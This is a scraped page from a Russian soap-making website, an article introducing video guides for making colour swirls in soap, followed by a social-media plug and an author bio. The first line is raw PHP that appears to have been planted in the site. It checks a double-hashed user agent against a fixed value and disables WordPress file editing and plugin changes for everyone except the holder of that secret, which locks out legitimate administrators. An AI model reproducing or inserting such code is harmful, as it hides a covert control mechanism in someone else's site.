if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 15 видеоинструкций, как сделать свирлы в мыле | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

15 видеоинструкций, как сделать свирлы в мыле

Мастера и страстные фанаты мыловарения любят делиться с новичками секретами мыловарения. Некоторые из виртуозов видят фигурки из мыла гораздо в более глобальном масштабе и предпочитают изготавливать не маленькие изделия для дальнейшего использования, а большие свирлы

Масте­ра и страст­ные фана­ты мыло­ва­ре­ния любят делить­ся с нович­ка­ми сек­ре­та­ми мыло­ва­ре­ния. Неко­то­рые из вир­ту­о­зов видят фигур­ки из мыла гораз­до в более гло­баль­ном мас­шта­бе и пред­по­чи­та­ют изго­тав­ли­вать не малень­кие изде­лия для даль­ней­ше­го исполь­зо­ва­ния, а боль­шие свирлы.

Свир­лы (от англий­ско­го ‘swirl’ – вихрь, завих­ре­ния), а по-наше­му ‘узо­ры’ в мыле явля­ют­ся пре­крас­ным укра­ше­ни­ем! Смысл в том, что­бы сде­лать 2 и более цве­та в мыле инте­рес­ным рисун­ком, кото­рый будет радо­вать глаз. Заня­тие это пре­крас­но тем, что узо­ры посто­ян­но полу­ча­ют­ся раз­ные и нико­гда не полу­чат­ся одинаковыми!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!